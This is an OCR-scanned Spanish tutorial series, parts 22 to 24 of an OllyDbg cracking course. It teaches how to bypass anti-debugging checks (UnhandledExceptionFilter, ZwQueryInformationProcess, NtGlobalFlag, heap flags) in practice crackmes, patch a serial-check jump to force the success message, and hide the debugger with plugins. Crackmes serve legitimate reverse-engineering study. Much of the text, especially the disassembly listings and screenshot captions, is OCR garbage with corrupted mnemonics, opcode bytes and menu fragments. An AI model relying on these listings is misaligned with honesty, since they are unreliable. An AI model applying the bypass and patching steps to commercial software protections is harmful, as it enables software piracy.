HideDebugger 1.23f, estén como en la primera imagen y además dejo por ahora las excepciones todas 
marcadas. 


Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | 
Security | Debug | Events Exceptions | Trace | SEX | Strings | 


IV Ignore memory access violations in KERNEL32 

Ignore (pass to program) following exceptions: 

INT3 breaks 

Single-step break 

Memory access violation 

Integer division by O De 
Invalid or privileged instruction 

Al FPU exceptions 


10103010 


Ignore also following custom exceptions or ranges: 


Doy RUN 


Y el crackme llega a la ventana principal pero la protección esta después. 


Coloco un serial falso y apreto check 


Debugged program was unable to process exception 
a _ _  __ ___—— 


Me dice que no es posible procesar la excepción y se cierra si doy RUN. 


M]] 0120FE 


Command [El dE 


tionF 


v 


Process terminated, exit code CODODOOS (-1073741819.) —[Terminated 


Bueno me doy cuenta de que si lo pruebo fuera de OLLYDBG, el crackme no se cierra, continua 
funcionando y dándonos la posibilidad de seguir intentando con diferentes seriales. 


Bueno reiniciémoslo y veamos las apis que utiliza 


[e] File View Debug Plugins Options Window Help 


68114000 
ARB1ODGA 
a? 
[1] 


1] 
39304000 
O 


99010000 | CALL 
17] 


30019099 
50304000 


[1] 
40104000 
117] 
68 BB304000_ Pl 
FF35 50304001 
ES 44010000 
Es 56010009 
55 


£BEC 
CES 1101 
$817D_10 EB93 
75 B7 


EB 21 
E9 96000000 
s17D 10 ECas: 
BFSS 39000901 
EB 7F 


E9 82000090 
837D_6c 18 
75 7C 


EB 72 

68 FFOBBBB 
68 54304000 
68 E9030000 
FF7S_08 


Pa Prananan 


Sohynx. 00491108 
ionFilter 


lExecuteA 

kl lu le = NULL 
Binary 
Assemble 
Label 
Comment 
Breakpoint 
Hit trace 


Run trace 


NULL 
Sphynx. 0040104 
NULL 

"Sphyna" 


Follow immediate constant 
Go to 
Follow in Durmp 


rent module (trim ' 
Find references to 
Mic 


1a4B20BC Import DebuaBreak 
B0402028| .rdata Import alogBoxParamA 
B0402010| .rdata | Import Ex itProcess 
60402024 | .rdata Import GetDlaltemTextA 
B0402009| .rdata | Import 2.GetModu leHandleA 
B0402008| .rdata | Import IsDebuggerPresent 
60402020 | .rdata Import MessageBoxA 
D0401000| .text Export E i 

B0402004| .rdata | Import 

60402018 | .rdata Import E Hecutel 
BO040202C| .rdata | Import wsprintfA 


Recordamos que el plugin HideDebugger tenía la opción para protegernos de los trucos de esta api 


Hide Debugger [Opti... [Xx] 
Protect against: 
IsDebuggerPresent 
FindWindow/EnumtWindows 
O Terminos 

O 


Pero antes de poner la tilde aprenderemos a pasarlo a mano y a ver como trabaja 
Veamos la definición de la api SetUnhandledExceptionFilter en el WINAPI32 


SetUnhandledExceptionFilter 


The SetUnhandledExceptionFilter function lets an application supersede the top-level exception handler that Win32 
places at the top of each thread and process. 


After calling this function, if an exception occurs in a process that is not being debugged, and the exception makes it to 
the Win32 unhandled exception filter, that filter will call the exception filter function specified by the 
pTopLevelExceptionFilter parameter. 


LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter( 
LPTOP_LEVEL_EXCEPTION_FILTER ¿pTopLevelExceptionFilter ¿exception filter function 
); 


Bueno vemos que uno de los parámetros de la api, es la dirección de donde continuara ejecutándose, 
cuando el programa encuentre una excepción, siempre que el programa NO ESTE SIENDO 
DEBUGGEADO jeje, allí lo dice y para comprobar si esta siendo debuggeado o no utiliza un llamado a 
ZwQueryInformationProcess. 


Bueno miremos el programa, allí mismo en el inicio ya llama a esta api 


ab e MA E aca Y 1 Y Y 1 1 1 Pf Tf / MEF 
5 68 68114006 PUSH Sphynx. 600401108 plopLevelFilter = Sphynx.00401108 
E Es AAB1BBBO etUnhandledExcept ionFi lter 


S 
5A B7 f IsShown = 
£0o AR Mo£N ir 


- NE! 
Como vemos el único parámetro, es la dirección adonde continuara ejecutándose el programa cuando 
halle una excepción, si es que no hay debugger jeje, ira a 401108 si hay debugger ira al tacho de basura. 


560401005 
0040100 
anñdaA1 ARS 


PUSH 7 
PISH A 


O sea ya veremos que un programa coloca manejadores de excepciones, para cuando se produce una de 
ellas, el programa siga corriendo a partir de la dirección que indica el manejador, pues esta api hace eso, 
fuerza al programa a que cuando encuentre una excepción, continúe a partir de la dirección que nos indica 
el parámetro, pero eso si siempre y cuando no haya un debugger. 


Bueno pongamos un BP en las dos apis que trabajan juntas estas son SetUnhandledExceptionFilter y 
UnhandledExceptionFilter las hermanas jeje. 


aARÍASASA| BA AR AA AA1AA AR AR AR 


Command TIE JE BP 


Program entry point 


o Bp SetlnhandledExceptionFilte MIE B 


l Proaram entru point 


Ahora demos RUN 


lv 4) A] 200] te +3] Pu ds] 8) PE] DU O AS O DO PO FO O E E O E E 


U EDI,EDI ntdll.1C920738 


BP,ESP 
PUSH DWORD PTR SS: CEBP+8] 


PUSH ERX 
PUSH kerne 132. /CS833AC 


PUSH EAX 


FF7S 08 
ES ESFRFFFF 


Ja Jr je o Ja pd po 
DD 


68 AC33887C 
ES BESARREF 


PA AAA ANA 


Para al inicio del programa cuando instala la dirección donde continuara cuando halle una excepción. 


from Sphyn*. 00401005 


Command ElEMIME w| E 
Ahora demos RUN y vemos que para en SetUnhandledExceptionFilter llamado desde dlls 


pt ion EN from shellext.00E704B1 
pTopLevelFilter = $t.BBE70454 

RETURN to shellext 9 

kernel132.GetProc 


Ahora tipeo un serial falso y apreto CHECK y para en la otra api en UnhandledExceptionFilter, porque ha 
hallado una excepción que seguramente ha sido generada por el programa intencionalmente para llegar 
aquí y que esta api decida si esta siendo debuggeado o no y de esta forma ir a la zona caliente en 401108 
O al tacho de residuos jeje. 


Jm Pl Pi ic A in a A ia $ SS Y 9 999 -ldá;Á FOO 
63 438020000 PUSH 248 

68 ENS5S67C PUSH kerne 132. /CS635E0 

ES 32F9F9FF 


Al cos6a87C  [MOU EAX,DWORD PTR DS: [7C8836CCJ 
8945 Es MOU DWORD PTR SS: CEBP-1C],EAX 
PESCA A 


nn nr 


E e de de 


e to TATI ter from kernel132./C84361D 
pExceptionIinfo 2F730 
4| RETURN to kerne 


Esta api verificara si el proceso no esta siendo debuggeado y hará el salto a 401108, traceemos con f8 la 
api a ver como detecta el debugger. 


6A B7 
ES FOB3FAFF 
5) 


FF1S AC1OSa7C 
85Cco 
BFSC A2000000 


ntdll.Z2wQuery Informat ionProcess 


TEST_EAX, EAX 
3980 DCFEFFFF |CMP DWORD _PTR_SS: [EBP-1241, EDI 


Llegamos, aquí este el segundo truco antidebugger que veremos hoy, es una forma de detectar el 
debugger que usa esta api y que puede usar un programa separadamente llamando a la api directamente 
Z wQueryInformationProcess con el parámetro INFO CLASS=7 


hProcess = FFFFFFFF 
InfoClas ? 
Buffer = BO12FSE4 


ES p 
B4|f Bufsize = 4 
bb |kpRegsize = NULL 


Esta api devuelve información del proceso que esta corriendo y con el parámetro INFOCLASS=7 
devuelve la información en el buffer de si el proceso esta siendo debuggeado o no. 


Veamos el buffer en el dump 


Follow in Stack » Enter 


FFFFFFFF 
sooowoo?7  Appearance 
BOLZFSE4 
00000004 
GO0BBBGO 
GODOBBGÓ 


CACACACACACACALA 


DOES 
ODO 
e poda po pr a pm 

y 


n...Llosno 


Ese es el buffer vimos que su tamaño es 4 bytes, y allí la api devolverá FFFFFFFF si esta siendo 
debuggeado el proceso o cero si no lo esta, pasemos con f8 la api a ver que guarda allí. 


00 7F 00 00 0O0|*.L.O... 
a66 a6aA a6R AA aa 


Allí vemos que devuelve FFFFFFFF o sea que hay debugger mi amigo jeje 


r DDLU EDI EHA¿EHA 
19 BFSC A2B09BBaa 

39BD DCFEFFFF |CMP DWOR) R_SS: [EBP-124],EDI 
v BF34 96000000 

64:A1_138000000|MOU EAX, DWORD PTR FS:[18 

2640 30 MOV EAX. DWORD PTR DS: EEA+30] 


Vemos que luego viene una comparación que ve si el valor ese es cero o no, ya que EDI vale cero. 


MER 


PUSH 


9 aaa 
63 02000020 


EOI-00000000 
Stack SS: [0B12F5E41=FFFFFFFF 


Y allí no salta 


FF1s aciosazc | cALADIdRD PTRODSIECEn ta NEQUERIRESE ntdll.ZuQuery Infos 


:17| 8508 TEST EAX, EAX 
:19 + BFSC A2OBBBB 

398D DCFEFFFF |CMP DWORD PTR SS: CEBP-124],EDI 
vr 8r84 96000000 | JE kernel32.7C8620C1 

64:A1 18000000| MOU EAX, DWORD PTR FS:[18] 
38B40 30 MOU_EAX, DWORD PTR DS: [EAX+30] 
F640 69 al TEST BYTE PTR DS: CEAX+69],1 
oFs4 Fio7o000 | JE kernel32.7086342F 
3B03 MOU EAX, DWORD PTR DS: CEBXJ 
3930 CMP DWORD PTR DS:CEAXJ,ESI 


6A Bi PUSH 
PUSH kerne 132. 70885408 


TEST Hot 


iS 


£ 
A 
an 
10) 
sil 
e 


3 

=y 00 

man 
(== 

107 

+ 


£8B03 MOU EAX, DWORD PTR DS: [EBXJ 
68 [14358670 PUSH kerne 132. 70862504 ASCII ”.cxr [conte 
FF?3 04 PUSH DWORD PTR DS: [EBx+4] 
68 AC35267C AE ds ASCII ”.exr [(excer 
68 202358670 PUSH kerne132.7C86358C ASCII "Code perfor 
FF7A BC PUSH DWORD PTR DS: CEAX+CI 
63 6C358670 PUSH kerne 132. 7C863560 ASCII "Invalid adc 
FF?O 18 PUSH DWORD PTR DS: [EAX+18] 


kerne 132. 710363538 ASCII "access vio 
20000002 


Jump is NOT t e 
>CSe2Ct1zkerne (32. rcs62cci 


Command Bp 401108 y] BP 
| Debugged program was unable to process exception 


Vemos que se va al error y se cierra. 


Ahora reiniciare y repetiré el proceso pero esta vez modificare el resultado de la api 
ZwQueryInformationProcess. 


Reiniciemos y cuando llegamos a 


50 PUSH EARX 
6A a? PUSH 7 
ES FDBSFAFF 

50 H_EA%X 


FF15 AC10S07C ntdll.Z2wQuery Informat ionProcess 
85Có TEST EAX, EAX 

OFSC A2000008 | JL kernel32.7C862CC1 

3980 DCFEFFFF |CMP DWORD PTR SS: [EBP-124],EDI 


PRA Ncananraa 


Pasamos la api con F8 


00D 
pur 


Binary 


Breakpoint Fill E 


Cambio el contenido a todos ceros 


aaa aaa 
Di 


yO o 
le pol fol Jl o Jr o 


Edit data at 0012F5E4 
ASCII 


UNICODE | 


HEX +04 Ba 


[VW Keep size 


Cancel | 


o q. u UÑALEAO FI 121 ECM CHAN 
BFEC A2B0BBAn 
3 m DOFEFFFF |CMP DWORD _PTR SS: [EBP-124],EDI 
aFS4 9 3 
Al JG|MOU EAX, DWORD PTR FS: [18] 


mm FOX NHIARA PTR Nas: TFOY+241 


EDI= 


312 2FSE4 700000000 


ri 


Stack 


TEST EAX, EAX 
CMP DWORD_PTR_SS: [EBP-124],EDI 
| JE kernel32. 7C862CC1 


3/MOU EAX, DWORD PTR FS: [18] 
MOU_EAX, DWORD PTR DS: [EAX+307 


TRATO MITA ATA AR TPANITA” 


39BD_DCFEFFFF 
9rSs, 26090000 


168 


Y si doy RUN 


o Jl il pc a Aa iaa PP) PS SS Y YO Y 


ESI, ¿L J] 
EAX, DWORD PTR DS: [ESI+4] 
EAX, BBS 


ESI,EAX 
MOU EAX, DWORD PTR DS: [EAX] 


EAX, BE 
MOU DWORD PTR DS: [ESIJ,EAX 
MOU EAX, DWORD PTR DS: [463153] 
XOR ECX, ECX 
XOR EDX, EDX 


Vemos que ahora si llega a 401108 y mas abajo veo la parte caliente 


MUY EHXA, DWURO FPIR US: L4u3lo3J 


ECXx, ECX 


EDX, EDX D 
EST, Sphynx. 00403007 

EDI; Sphynx . 00403163 
DL,BYTE PTR DS:[ESI+12] 
AL;BYTE PTR DS: CECX+ES1] 


AL, DL 
BYTE PTR DS: [ECX+EDI],AL 


INC ECX 
cnhP ok 
PUSH MB_OK¡MB_APPLMODAL 
PUSH Sphynx. 00403163 be 
PUSH Sphynx. 100403176 ex 
PUSH A hOwner = MULL 
MessageBoxA 


X2MR FAX. FAX 


s102 2143658] ADO EDX, 87654321 
41 INC ECX 


2808, CMP ECX, EAX 
. 81FA 382AB4Ci CMP EDX,C3B42A38 
vp76 32 
- [3309 XOR ECX,ECX 
- | 3302 %0R EDX, EDX 
. (BE 67304000 |MOU ESI,Sphynx. 00403007 
. |BF_ 63314000 |MOU EDI, Sphyun:. 00403163 
a + |8A56 12 MOU DL,BYTE PTR DS: LESI+12] 
5 5 | 8ab431 MOU AL;BYTE PTR DS: CECX+ESI] 
a . [3zc2 %OR AL; DL 
. | esp439 MOU BYTE PTR DS:[ECX+EDIJ,AL 
Ñ INC ECX 
. | 83Fo 31 CMP ECX, 31 
al 75 F2 Lo 
6A 06 PUSH 8 e = MÉÑOKIMB_APPLMODAL 


638 63314000 |PUSH Sphyn*. 0403163 
638 76314000 |PUSH Sphyn*. 00403176 


6A 6B PUSH A hOwnex = NULL 
ES 19000000 | CALL -<JMP.Suser32.MessageBoxA> MessageBoxA 
3300 XOR EAX, EAX 

DEC EAX 
ra Ema 


.*o y. ...... 


Al invertir este salto y forzarlo a que no salte, mostrara el mensaje correcto de que el crackme esta 
solucionado. 


4 CMP EDx, C3B42A38 


ECXx, EC 

EDX, EDX 

ESI, Sphynx. 00403007 

EDI, Sphyn+. 00403163 
DL,BYTE PTR DS: [ESI+12] 
AL,BYTE PTR DS: [ECX+ESI] 


BYTE PTR DS: [ECX+ED1],AL 
ECX 

ECX,31 

PUSH B 

PUSH Sphynx.B0403163 

PUSH Sphynx.BB403176 A 
PUSH O hOwner = NULL 


MessageBoxA 
XOR EAX, EAX 
DEC EAX 


MB_OK¡MB_APPLMODAL 


Ahora doy RUN 


Sphynx by dOb 2004 [X] 


Well Done ! Write a Tutorial ! 


Bueno como he dicho todo esto puede ser evitado si ponemos la tilde en el plugin HideDebugger en 
UnhandledExceptionTricks y cierro y vuelvo a abrir el OLLYDBG veo que correrá perfectamente. 


El único tema que queda por ver es como evitar la detección por la api ZwQueryInformationProcess, 
cuando esta es llamada en forma directa y no dentro de la api UnhandledExceptionFilter. 


Por supuesto ya vimos como pasarlo a mano cambiando a cero el valor de retorno del buffer, pero existe 
algún plugin que lo haga automáticamente, así nos olvidamos de esto? 


http: //www.pediy.com/tools/Debuggers/ollydbg/plugin/hhiideOD/hideod.rar 


Este plugin permite que el programa sin tener que cambiarlo a mano nos proteja de la deteccion de esta 
api. 


EEE Options Window Help 

ul o 1 +BP-OLLY » 

5D — 

Abona 2 CommandBar — » 

A 3 Hide Debugger > 


A dl 
E 04 5 WindowJuaqler » Option 


Option 
Option 
Y SetDebugPrivilege IsDebuggerpresent 
NtGlobalFlags 
[Y OutDebugStringá HeapFlags 
ForceFlags 


Y Process32Next 
Y CheckRemoteDebuggerPresent 
Y ZwSetinformationThread 


ÍV UnhandledExceptionFilter 


Vemos que tiene muchas mas opciones que el otro Hidedebugger, así que puede complementarse, es 
importante si se activa cualquier opción, siempre poner la tilde también en AUTORUNHIDEOD para que 
proteja automáticamente y no tener que apretar HIDE cada vez que arrancamos OLLYDBG. 


Option 

ÍV Auto Run Hide OD ÍV HideNtDebugBit 

[Y SetDebugPrivilege IsDebuggerpresent 
NtGlobalFlags 

[Y OutDebugStringá HeapFlags 
ForceFlags 


ÍV Process32Next 
ÍV CheckRemoteDebuggerPresent 


Y ZwSetinformationThread 


le 


Vemos que aun quitando la protección contra UnhandledExceptionFilter, como esta detecta el debugger 
por medio de ZwQueryInformationProcess igual corre ya que el plugin nos protege también de esta 
última que es la usada para detectar si hay debugger o no como vimos. 


Bueno ya vimos como protegernos de estos dos trucos manualmente y por medio de plugins, nuestro 
OLLYDBG parcheado y con ambos plugins es casi una fortaleza jeje igual seguiremos viendo los trucos 
antidebugging que faltan, que aun hay mas. 


Hasta la parte 23 
Ricardo Narvaja 
31 de diciembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG parte 23 


Vamos a ver aquí la ultima parte sobre antidebugging que versara sobre los ProcessHeap Flag y 
NTGlobalFlag y con eso ya tenemos una idea de los trucos antidebugging mas conocidos, por supuesto no 
son todos pero creo que son los básicos que hay que saber y con eso correrán la mayoría de los programas 
en OLLYDBG, por supuesto hay algunos protectores como execryptor que son campeones de la 
detección de OLLYDBG y además de todos los trucos que enseñamos aquí, añaden 4 o 5 mas de su 
propia cosecha, pero eso es algo mas especifico para leer tutes sobre dicho packer como los escritos por 
Juan Jose y además saber que execryptor cada versión que saca nueva, trata de agregarle nuevas 
detecciones y trucos por lo cual es necesario hacer un estudio sobre los antidebugging de execriptor mas 
que sobre antidebugging en general. 


Ya sabemos que con los plugins que tenemos ambos flags no serán detectados, pero es bueno saber como 
ubicarlos en nuestra maquina. 


Option 


[Y Auto Run HideO0D ÍV HideNtDebugBit 


Y SetDebugPrivilege IsDgbwg dirpresent 
NtGlobalFlags 
[Y OutDebugStringá HeapFlags 


Ív Process32Next silla 


Y CheckRemoteDebuggerPresent ZwQueryinformationProcess 


C none 
ZwSetinformationThread ( methodl1 


C method2 


[Y UnhandledExceptionFilter 


Allí están en el PLUGIN HIDEOD, las opciones para ocultar el OLLYDBG de la detección por ambos 
flags, pero como podemos localizarlos en nuestra maquina a mano, pues eso es saber y el saber no ocupa 
lugar. 


Estos dos últimos flags muestran que el proceso esta siendo debuggeador, son fácilmente localizables, si 
no recuerdan como hallar la zona del byte IsDebuggerPresent relean la parte 19 que es la que 
explicábamos como hallar a mano la zona del byte IsDebuggerPresent ya que estos bytes son vecinos de 
ese. 


Option 


Auto Run HideOD ” HideNtDebugBit 


SetDebugPrivilege IsDebuggerpresent 
NtGlobalFlags 
OutDebugStringA HeapFlags 


Process32Next ForceFlag 


ZwQueryinformationProcess 


C none le 


ZwSetinformationThread (“ method1 


CheckRemoteDebuggerPresent 


UnhandledExceptionFilter  method2 


Quitémosle un minuto la tilde en el plugin para ver los valores que tienen los flags, sin utilizar el plugin 
para ocultarlos. 


Para practicar con estos flags utilizaremos el CRACKME DE CRUEHEAD 1 en el cual localizaremos 
ambos flags. 


Abrámoslo en OLLYDBG, recordando verificar que la tilde en el plugin HideOdbg como muestra la 
imagen anterior este sin marcar. 


[S He. view  LeDUg  PIUGINS Upuons  vvmndow Help 


dx] ef] visi $lol 1] El ojejmitiwjn]c]Jk]8]r]-]s| ¿5381?] 


5A 08 PUSH 8 
Es FFo40000 | CALL <JMP.SKERNEL32.GetModuleHandleA>  |LGetModu leHandleA 
A3 Ca2040080 |MOU DWORD PTR DS:[4026CA],EAX 


. 6A 00 PUSH B Title = NULL 

. 68 F4204000 | PUSH CRACKME. 044020F4 [: lass = "No need to disasm the codet” 
. ES A604000B FindllindowA 

. BBCO OR EAX, EAX 


MOU DWORD PTR DS: [402064], 4003 

MOU DWORD PTR DS: [402068], CRACKME. lin dPyr 
MOU DWORD PTR DS:[40206C],0 

1 Ep la A [4020701,9 

EAX, DIWO R_DS: [4028CA 

Hoy DWORD PR Da [402074], EAx 

PUSH 64 RsrcName = 109, 


PISH FOY hTner —> Nil 1 


... +... qn 


Pues bien, veamos como localizar y cambiar a mano ambos flags. 

Lo que debemos hallar es la zona del byte IsSDebuggerPresent como vimos en el tutorial 19, la forma facil 
de hallar esa zona es marcar el registro EBX aquí en el ENTRY POINT, y hacer FOLLOW IN DUMP, la 
forma completa puede leerse en ese tutorial si alguien no la recuerda. 


Estoy en el ENTRY POINT 


Marco EBX-FOLLOW IN DUMP 


[e] 5] 132] 


Registers (FPU) 
JLeA BODBGODO 
DB12FFEO 
7C91EB94 
5 EPrOS 
Increment Plus OO12FFFO 
: EFFFFEFF 
Decrement Minus 70928738 
p0401000 CR 


wed to disasm the codet” 


Ss 3 98E 
Set to 1 SS 0023 32 
o. Modify Enter FS 6838 3: 
i E , 65 8990 NL 
Copy selection to clipboard Ctri+c 
3C_ARROW . 2 LastErr EF 
ds Copy all registers to clipboard 0O0OB283 1h 
empty -UNOF 
9.0 
empty 0.0 
co lale 2 fempty 0.0 
¿RACE View MIMIX registers a: 
E ANA 1.Al 


a ' AE emntu 


Y en el dump vemos la zona deseada, recuerden que en su maquina puede cambiar la dirección, con 
respecto a la mía y cada vez que reinicien un programa también variara. 


2 

Gi$1.-Me 
Pi: 
Mist 
ep 


Por supuesto recordamos que ese es el Byte detectado por la api IsDebuggerPresent, pues el 
NTGlobalFlag es vecino de este lo vemos sumando 68 a la dirección, que nos mostraba EBX, en mi caso 
EBX era 7ffda000 le sumo 68, será 7ffda068. 


¿baivdel 
B...£)0w 


CyL O. 
OL, 
. 0068400 
LA 
2 ... 
A 
«Es «mb 


«BD... 


Ese es el famoso NTGlobalFlag que es diferente de cero si hay un debugger y cero si no lo hay, 
pongamos a mano el flag este a cero, modificando ese valor a mano. 


AS 


Breakpoint Fill with OC 
Search for » Fill with FF 
Go to » E 


Undo selection Alt+BkSp 
Copy 


Binary cop 


vw Hex » 
Text » 
Short » 
Long » 
Float » 

Disassemble 

Special » 


Appearance 


El 
b0 30 9B 07 6D ES FF FF E CEA 


Lo pongo a cero 


aia! 
B...710w 


CÓGl %.. 
OA, 
. 006400 
..16,_po 
208... 


Cs mb 


Allí esta localizado y puesto a mano a cero el NtGlobalFlag 
Ahora debemos localizar el otro byte el ProcessHeap Flag, ese también se localiza fácil. 


Al valor que me otorgaba EBX en el entry point en este caso le sumo 18, y nos da una dirección que es en 
mi caso 014000, que es la dirección del heap o sea una zona de memoria creada al arrancar el programa 
que guarda ciertos datos del mismo, no especificaremos mucho aquí sobre eso. 


..0,3áz, 


¿boivde! 
(hstaodo 


CEdiOn. 
Spot, 
+ 005400 
..16,»A6 
B|. +08... 
Emb 
E 
CA O 
G ' 


pta: 
B...(..0 
E 


..... 
AA 


Breakpoint 
Search for 
Follow DWORD in Dump 


Marcamos los bytes y elegimos FOLLOW DWORD IN DUMEP con lo cual nos llevara a la zona del heap 


401 940b00B 
40145bB0S8 
40149010 
4BB145b518 


4014020 
4051450028 
00140030 6.B2.... 
45145038 ....o. ..... 
00140040 a 


Y sumándole 10 a la dirección base del heap llegamos al dword que esta alli marcado, el cual esta a cero 
como si no hay debugger, debe ser por tanto plugin que tenemos, si abro el mismo crackme en un ollydbg 
sin ningún plugin. 


00140000 


3 Bm 75 BO s...ubB.. 
90140003 62 66 60 50/ - 7"b..P 


Odo "3 .. 
00140040/06 00 090 06 938 BS 14 00 ....y441. 
00140045| 17 00 90 00 FS FF FF FF[$...? 

00140055/568 06 14 668 59 BO 14 00 P.1.P.1. 


001409 40 06 14 66 BO 00 00 00 Re..... 
601400605160 00 09 499 Bn 00 OO  ..oooo.. 
601400631060 66 00 90 Ba DO Ol oooonsos 


Veo que allí no esta a cero, que es el valor cuando hay debugger quiere decir que entre tanto plugin este 
byte se pone a cero, por alguno de ellos aun sin estar la tilde marcada. 


Por lo demás volvamos a poner las tildes en el HideOdb 


[Y Auto Run Hide OD ÍY HideNtDebugBit 


sDebuggerpresent 


NtGlobalFlags 
[v OutDebugStringA HeapFlags 


ÍV SetDebugPrivilege 


[Y Process32Next MOREENIAOS 


-ZwQueryInformationProdlss : 


C none 
Y ZwSetinformationThread ( methodl 


C method2 


ÍV CheckRemoteDebuggerPresent 


[Y UnhandledExceptionFilter 


Y reiniciemos el crackme de cruehead 


ide ive! 
B...5)0w 
E 
......00 
. 0058400 
.. 0.0 


OS 
CigiooN 
pido: 
B...(..0 


Vemos que parados en el entrypoint tanto el flag de la api IsSDebuggerPresent como el NtGlobalFlag están 
a cero, y si busco el ProcessHeapFlag 


Ar 
do... 
ESPA 
p.r. B9. 
t.v.089. 


También esta a cero, quiere decir que verifique que el plugin funciona correctamente y que el OLLYDBG 
no será descubierto por alguno de estos flags, y además aprendimos a hallarlos y cambiarlos a mano. 


El ultimo truco antiolly que solo lo mocionare pues al parchear con el repair ya dimos cuenta de el y 
ambos plugins lo solucionan es el 


Option 
Option — 
[Y Auto Run Hide OD [Y HideNtDebugBit 
[Y_SetDebugPrivilege IsDebuggerpresent 
NtGlobalFlags 
OutDebugStringA HeapFlags 
ForceFlags 


ocess32Next 


ÍV CheckRemoteDebuggerPresent cuco ma tlonf roces: 


C none 
Y ZwSetinformationThread iaa] 
¡Y UnhandledExceptionFilter l method2 


Hide Debugger [Opti... 


Protect against: 


IsDebuggerPresent 
FindWindow/EnumwWindows 
TerminateProcess D 


o 
o 


Unhandled exception tricks 
OutputDebugString exploit 


O Detach 


Se refiere a un bug del OLLYDBG que cuando el programa envía una determinada string muy larga a esa 
api el OLLYDBG no la puede procesar y se cuelga, teniendo los plugins por supuesto esto no afecta en 
nada solo lo pongo aquí como dato ilustrativo aquí extractado del tutorial de Juan Jose de execryptor le 
copiamos la parte que explica esto. 


Bueno, me dejo de rollos, de esta manera me dí cuenta que el problema venia con el truco antiOlly 
de OutputDebug$tring, que justamente utiliza este programa y no los demás execryptos que había 
probado. Este truco consiste en mandarle un string preparado al Olly, que no lo sabe aceptar, y te da 
un error que cierra el Olly (creo ¿?) porque en realidad nunca me he encontrado con él, y sí algún 
programa lo ha tenido el plugin HideDebugger lo neutraliza, y te manda una linda sonrisa: 


Debug string: :-] 


La forma de realizarlo es muy simple tienes que llamar a OutputDebugStringA con una cadena de 
caracteres Y%s bien larga, yo he contado 100d: 


Bueno como el tute esta genial, para que abundar, allí esta clara la explicación y los plugins dan cuenta de 
este bug del OLLYDBG perfectamente. 


Para practicar les dejo el crackme adjunto antisocial tiene todos los trucos que vimos en la parte de 
antidebugging , mas un par de trucos caseros jeje, el tema es hacerlo correr en OLLYDBG, si alguien 
hace un olly sin plugins ni nada en otra carpeta y lo hace correr a mano aplicando todo lo que vimos, pues 
se recibe de genio antidebugger a mano, por supuesto deberá poner un poco de imaginación pues tiene un 
truco que le impide correr mas que ser un truco antidebugger hay que reparar una línea nopeandola, para 
que pase ese primer error, luego de eso tiene los antidebuggers que hemos visto, mas uno que no hemos 
visto y es el siguiente si al quitarle todas las tildes de DEBUGGING OPTION-EXCEPTIONS les para en 
un INT68 es un comando que provocara un error, el cual hay que nopear para que continué corriendo el 
programa, lamentablemente si ponemos todas las tildes al tratar de pasar esa excepcion nos dara error el 
OLLY y se terminara todo. 


O sea sepan que si les para en cualquier excepción si no están puestas las tildes, se debe apretar SHIFT 
mas F9 para pasarlas, eso lo veremos en la parte siguiente de excepciones, pero si la excepción se genero 
en un INT68, solo se debe nopear ese comando y dar RUN con eso pasara bien. 


Bueno les dejo una dura diversión, si quieren pueden tratar de repararlo y hacerlo correr primero con los 
plugins con lo cual podrán ver el error y ver donde esta el INT68 y ver que el programa corre, y como 
segundo paso pueden abrirlo en un OLLYDBG sin plugins y tratar de evitar todo a mano, a ver si les sale, 
eso si será duro, jeje 


Hasta la parte 24 
Ricardo Narvaja 


04 de enero de 2006 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 24 


Me pidieron que antes de empezar con la parte que versa sobre excepciones, muestre como se hace correr 
en OLLYDBG el antisocial que deje como ejemplo, la vez anterior. 


Antes que nada sabemos que es un programa empacado, y eso aun no se ha enseñado por lo cual lo 
haremos correr en OLLYDBG haciendo los cambios en la memoria solamente sin guardarlos, cuando ya 
sepamos desempacar pues podremos guardar los cambios definitivos. 


Primero lo haremos correr en un OLLYDBG renombrado con todos los plugins puestos para ver porque 
no corre y tratar de arreglarlo. 


Arrancamos el antisocial en mi OLLYDBG renombrado, parcheado y con todos los plugins habilitados. 


Compressed code? 


o Quick statistical test of module 'Antisoci' reports that ¡ts code section is either compressed, 
27 encrypted, or contains large amount of embedded data. Results of code analysis can be very 
unreliable or simply wrong. Do you want to continue analysis? 


1 
5e/s19]5]51515] 
EB045D45 


3 
A 
EDFFFFFF MOU EBxX,-13 

B3DD ADD EBx,EBP 

S1EB 00FOB90B | SUB EBX, 9FOBO 

S38D 22049090 ICMP DINORD PTR SS: CEBP+422],0 


8990 220400008 |MOU DWORD PTR_SS: [EBP+4227,EBXx 
w AFAR ARASARAA 


Allí ya vemos algo extraño, pues POPAD es la sentencia que se usa para recuperar del stack, los valores 
que guardo previamente un PUSHAD, y aquí no hay ningún PUSHAD antes, por lo tanto hay algo 
sospechoso allí. 


Lo corremos igual a ver que pasa 


nor Y mevrr dd | ds dl Y AS A 


Er ela] vis] sit] el] >El ujejmit]iwjH[c]o] 


PUSH Antisoci.bB6474938 
RETN 


MOU EAX, DWORD PTR SS: [EBP+426] 
LEA ECX, DWORD PTR SS: [EBP+43B] 
PUSH ECX 


PUSH EAX 


Command y] 


Access violation when writing to [00130000] - use Shift+F7/FS/F9 to pass exception to program 


O sea da error cuando quiere hacer el PUSH como si el stack no tuviera permiso para escribir alli, pero el 
stack siempre tiene permiso de escritura que ocurrió aquí, veamos el stack 


r38r46341 
(51515151515J13) 
00000061 
00BB2493 
DOBBBaBCA 
51s1s15]s151515] 
15151515] ]5)15) 
ls ls15]5151513] 
00090014 
00000061 
s1s15]5151513 


0B0BBB34 
1 ARARAAI 1d 


| 
[Amos 


B 
a 


DO 


Doo 
Dl 


y 


O sea el valor superior del stack es 130000, y si reiniciamos el programa 


arAao E Cararara! Carara td Eraraía siria 


Y vemos las secciones, vemos que el stack va en mi maquina desde 12c000 hasta 12ffff, el error fue que 
el stack se salio de esa sección, y ahora apunta a la sección siguiente que empieza en 130000 y que como 
no es el stack, no tiene permiso de escritura y da error. 


Lleguemos nuevamente a la zona del error 


Un EL EL 


ORD PTR SS: [EBP+3A87,EAX 


UD. 7 
> ASO3000a 


v/75 08 
'B2| (BS 01000000 MOU EAX, 1 
C2 BcoB 
+68 88494700 PUSH Antisoci.00474988 


Vemos que el programa ejecuta otro popad y hace un salto JNZ al PUSH que da error veamos, pongamos 
un BPX en ese popad antes del error. 


>» rur ELA 

BBC9 OR ECX,ECX 

2985 AsO3000a |MOU DWORD PTR SS: CEBP+3A8],EAX 
61 POPAD 

75 B8 

B3 61000000 MOU EAX, 1 

C2 BCO RETN BC 

68 88494700 PUSH Antisoci.00474988 

